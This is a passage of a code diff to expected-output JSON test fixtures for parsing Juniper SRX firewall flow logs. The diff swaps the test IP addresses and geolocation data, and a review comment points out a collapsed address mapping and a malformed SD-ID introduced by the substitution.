roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025447100Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": 
"2013-01-19T15:18:17.040Z", "action": "flow_close", @@ -1947,7 +1758,7 @@ "port": 80, "bytes": 686432, "packets": 584, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1955,24 +1766,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 686432, - "packets": 584, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 584 }, "rule": { "name": "permit-all" @@ -1980,26 +1791,23 @@ "source": { "nat": { "port": 33040, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 33040, "bytes": 19592, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2050,9 +1858,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2062,13 +1869,13 @@ "port": 33040, "bytes": 19592, "packets": 371, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715461070Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"33040\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"175.16.199.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025452500Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", "action": "flow_started", @@ -2090,7 +1897,7 @@ "port": 80 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2098,22 +1905,22 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "permit-all" @@ -2121,28 +1928,25 @@ "source": { "nat": { "port": 33040, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 33040, "user": { "name": "user1" }, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2190,9 +1994,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2200,12 +2003,12 @@ "port": 33040 }, "port": 33040, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715465028Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"33040\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"175.16.199.1\" nat-source-port=\"33040\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025458200Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", "category": [ 
@@ -2227,7 +2030,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2235,24 +2038,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2260,26 +2063,23 @@ "source": { "nat": { "port": 48873, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2329,9 +2129,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2341,13 +2140,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715468995Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"216.160.83.57\" source-port=\"48873\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025465Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", "action": "flow_close", @@ -2369,7 +2168,7 @@ "port": 768 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2377,22 +2176,22 @@ "destination": { "nat": { "port": 768, - "ip": "30.0.0.100" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -2400,25 +2199,22 @@ "source": { "nat": { "port": 24065, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2455,9 +2251,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "30.0.0.100" + "67.43.156.14" ] }, "client": { 
@@ -2465,12 +2259,12 @@ "port": 24065 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715472612Z", - "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address=\"216.160.83.57\" source-port=\"24065\" destination-address=\"175.16.199.1\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025469300Z", + "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -2487,7 +2281,7 @@ { "server": { "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "informational" 
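Review bot: In the RT_FLOW_SESSION_CREATE_LS `original` line of this hunk the rewrite put 67.43.156.14 into source-address, destination-address, nat-source-address and nat-destination-address alike, so the `related.ip` array in the hunk just above shrinks to a single entry and the expected output can no longer tell source from destination or NAT from un-NATed addresses. The old fixture (216.160.83.57 → 175.16.199.1, NAT to 30.0.0.100) did exercise that distinction for an untrust→trust ICMP flow under `alg-policy`. I would give each role a distinct address already used elsewhere in this PR, e.g. `source-address="67.43.156.14"`, `destination-address="67.43.156.13"`, `nat-destination-address="10.0.0.26"`, and regenerate so `related.ip` again carries three values. The SD-ID in the same line was also changed to `[junos@67.43.156.15`, which is not a value a device emits and appears to be collateral from the same substitution. The event object begins before and ends after this hunk.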
@@ -2495,40 +2289,25 @@
 "destination": {
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-22",
- "city_name": "Changchun",
- "country_iso_code": "CN",
- "country_name": "China",
- "region_name": "Jilin Sheng",
+ "country_name": "Bhutan",
 "location": {
- "lon": 125.3228,
- "lat": 43.88
- }
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
 },
 "port": 161,
- "ip": "175.16.199.1"
+ "ip": "67.43.156.13"
 },
 "rule": {
 "name": "MgmtAccess-trust-cleanup"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Milton",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
- "location": {
- "lon": -122.3149,
- "lat": 47.2513
- }
- },
- "as": {
- "number": 209
- },
 "port": 37233,
- "ip": "216.160.83.57"
+ "ip": "10.0.0.26"
 },
 "juniper": {
 "srx": {
@@ -2568,18 +2347,18 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.0.0.26", + "67.43.156.13" ] }, "client": { "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715476670Z", - "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"37233\" destination-address=\"175.16.199.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025474Z", + "original": "\u003c14\u003e1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"67.43.156.13\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", 
@@ -2601,7 +2380,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2609,24 +2388,24 @@ "destination": { "nat": { "port": 80, - "ip": "5.0.0.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2634,26 +2413,23 @@ "source": { "nat": { "port": 48873, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "216.160.83.57", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2703,9 +2479,8 @@ "user1" ], "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.0.0.1" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2715,13 +2490,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715480186Z", - "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"216.160.83.57\" source-port=\"48873\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"48873\" nat-destination-address=\"5.0.0.1\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:15:58.025477900Z", + "original": "\u003c14\u003e1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2020-01-19T15:18:20.040Z", "action": "flow_close", @@ -2745,7 +2520,7 @@ "port": 80, "bytes": 2132, "packets": 34, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2753,24 +2528,24 @@ "destination": { "nat": { "port": 80, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 2132, - "packets": 34, - "ip": "175.16.199.1" + "ip": "67.43.156.14", + "packets": 34 }, "rule": { "name": "default-permit" @@ -2778,27 +2553,12 @@ "source": { "nat": { "port": 6018, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 58943, "bytes": 2322, - "ip": "216.160.83.57", - "packets": 42 + "packets": 42, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -2839,8 +2599,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.14", + "172.19.34.100" ] }, "client": { 
@@ -2850,13 +2611,13 @@ "port": 58943, "bytes": 2322, "packets": 42, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715483603Z", - "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"58943\" destination-address=\"175.16.199.1\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"6018\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025483700Z", + "original": "\u003c14\u003e1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"58943\" destination-address=\"67.43.156.14\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"6018\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"80\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"16118\" packets-from-client=\"42\" bytes-from-client=\"2322\" packets-from-server=\"34\" bytes-from-server=\"2132\" elapsed-time=\"60\" 
username=\"N/A\" roles=\"N/A\" encrypted=\"No\" destination-interface-name=\"ge-0/0/0.0\" category=\"N/A\" sub-category=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-14T14:17:11.928Z", "action": "flow_started", @@ -2880,7 +2641,7 @@ "port": 8883, "bytes": 9670, "packets": 96, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2888,24 +2649,24 @@ "destination": { "nat": { "port": 8883, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 8883, "bytes": 9670, - "packets": 96, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 96 }, "rule": { "name": "default-permit" @@ -2913,27 +2674,12 @@ "source": { "nat": { "port": 24519, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 64720, "bytes": 9530, - "ip": "216.160.83.57", - "packets": 161 + "packets": 161, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -2983,8 +2729,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.15", + "172.19.34.100" ] }, "client": { 
@@ -2994,13 +2741,13 @@ "port": 64720, "bytes": 9530, "packets": 161, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 23755000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715487209Z", - "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"idle Timeout\" source-address=\"216.160.83.57\" source-port=\"64720\" destination-address=\"175.16.199.1\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24519\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" 